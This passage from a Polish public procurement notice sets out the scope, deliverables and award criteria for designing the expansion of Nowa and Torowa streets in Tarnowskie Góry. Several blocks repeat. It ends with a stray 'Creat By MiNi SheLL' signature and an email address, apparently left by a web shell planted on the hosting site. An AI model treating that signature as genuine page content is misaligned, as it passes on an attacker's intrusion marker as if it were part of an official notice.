3.	Wykonawca w dokumentacji projektowej winien uwzględnić:
- inwentaryzację dendrologiczną istniejącego drzewostanu,
- odwodnienie pasa drogowego,
- rozwiązania kolizji z sieciami  jeśli takowe wystąpią,
- wykonanie badań geotechnicznych podłoża gruntowego,
- wykonanie i zatwierdzenie projektu zmiany organizacji ruchu na czas prowadzenia robót oraz docelowej,
- pełnienie nadzoru autorskiego w czasie trwania realizacji przedmiotowego projektu wg potrzeb Zamawiającego, przygotowanie wyjaśnień, odpowiedzi do opracowanej dokumentacji i przekazywanie ich Zamawiającemu w wyznaczonym przez niego terminie,
- wymagania w zakresie dostępności dla wszystkich użytkowników, w tym dla osób niepełnosprawnych.

4.	Wykonawca jest zobowiązany  do uczestniczenia w organizowanych przez Zamawiającego spotkaniach i naradach, w tym między innymi:
a) w spotkaniach, podczas których prezentowane będą koncepcje proponowanych rozwiązań,
b) w dyskusjach publicznych nad przyjętymi rozwiązaniami,

5. Wykonawca winien przekazać Zamawiającemu przedmiot zamówienia w następujących formach i ilościach:
a) w formie elektronicznej  - w 2 egzemplarzach (tekst w programie Microsoft World, rysunki w JPG, PDF),
b) w formie papierowej  - w 5 egzemplarzach,
c) w formie elektronicznej nieedytowalnej (pliki pdf) oraz edytowalnej (tekst  pliki doc i xls, rysunki  pliki dwg).

<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71320000-7, 71248000-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 08/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena </td><td>60</td></tr><tr><td>Doświadczenie projektanta</td><td>25</td></tr><tr><td>Kara za zwłokę</td><td>15</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>Wykonanie dokumentacji projektowej (projekt budowlany i wykonawczy) dla zadania pn.: Rozbudowa ulic: Nowej i Torowej w Tarnowskich Górach.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.	Zakres prac obejmuje:  
 - przebudowę pasa drogowego w zakresie jak na załączonej mapce poglądowej na ulicy Nowej i Torowej w Tarnowskich Górach,
- rozbudowa obejmowała będzie w szczególności: wykonanie chodnika, poprawę geometrii skrzyżowań oraz wzmocnienie istniejącej nawierzchni jezdni.
- zagospodarowanie pasa zieleni (ewentualna wycinka drzew + plan nasadzeń),
- przebudowa i zabezpieczenie sieci infrastruktury podziemnej i naziemnej ( w koniecznych przypadkach i wg wskazań Zamawiającego),
- konieczną przebudowę odwodnienia nawierzchni,
- pełnienie nadzoru autorskiego w czasie trwania realizacji projektu,
- wykonanie koncepcji wariantowych rozwiązań projektowych.

2.	 Dokumentacja projektowa powinna zawierać:
- projekt budowlany dla branż: drogowej oraz innych koniecznych branż,
- projekt wykonawczy dla branż: drogowej oraz innych koniecznych branż,
- wstępne koncepcje wariantowych rozwiązań projektowych  ( w wersji papierowej i elektronicznej),
- mapy do celów projektowych z uzgodnieniami branżowymi  w każdym egzemplarzu projektu,
- wypis i wyrys z rejestru gruntów  z odpisami z ksiąg wieczystych - w każdym egzemplarzu projektu,
- decyzję o uwarunkowaniach środowiskowych (jeśli taka będzie wymagana)  w każdym egzemplarzu projektu,
- decyzję na wycinkę drzew i krzewów (jeśli taka będzie wymagana)  w każdym egzemplarzu projektu,
- uzgodnienia wszelkich kolizji z gestorami właściwych sieci infrastruktury technicznej
  i teletechnicznej - w każdym egzemplarzu projektu,
- zgody na wejście w teren na czas realizacji inwestycji  w każdym egzemplarzu projektu,
- szczegółową specyfikację techniczną wykonania i odbioru robót dla każdej branży  2 egz.,
- informację dotyczącą bezpieczeństwa i ochrony zdrowia  w każdym egzemplarzu projektu,
- przedmiary robót wraz z kosztorysami inwestorskimi  2 egz. (z podziałem na etapy realizacyjne),
- wszelkie konieczne uzgodnienia, decyzje, pozwolenia i opinie  w każdym projekcie,
- wersję elektroniczną dla wszystkich pozycji,
- komplet dokumentów wymaganych do złożenia wniosku o pozwolenie na budowę

3.	Wykonawca w dokumentacji projektowej winien uwzględnić:
- inwentaryzację dendrologiczną istniejącego drzewostanu,
- odwodnienie pasa drogowego,
- rozwiązania kolizji z sieciami  jeśli takowe wystąpią,
- wykonanie badań geotechnicznych podłoża gruntowego,
- wykonanie i zatwierdzenie projektu zmiany organizacji ruchu na czas prowadzenia robót oraz docelowej,
- pełnienie nadzoru autorskiego w czasie trwania realizacji przedmiotowego projektu wg potrzeb Zamawiającego, przygotowanie wyjaśnień, odpowiedzi do opracowanej dokumentacji i przekazywanie ich Zamawiającemu w wyznaczonym przez niego terminie,
- wymagania w zakresie dostępności dla wszystkich użytkowników, w tym dla osób niepełnosprawnych.

4.	Wykonawca jest zobowiązany  do uczestniczenia w organizowanych przez Zamawiającego spotkaniach i naradach, w tym między innymi:
a) w spotkaniach, podczas których prezentowane będą koncepcje proponowanych rozwiązań,
b) w dyskusjach publicznych nad przyjętymi rozwiązaniami,

5. Wykonawca winien przekazać Zamawiającemu przedmiot zamówienia w następujących formach i ilościach:
a) w formie elektronicznej  - w 2 egzemplarzach (tekst w programie Microsoft World, rysunki w JPG, PDF),
b) w formie papierowej  - w 5 egzemplarzach,
c) w formie elektronicznej nieedytowalnej (pliki pdf) oraz edytowalnej (tekst  pliki doc i xls, rysunki  pliki dwg).



<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71320000-7, 71248000-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 08/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Doświadczenie projektanta</td><td>25</td></tr><tr><td>Kara zwłokę</td><td>15</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com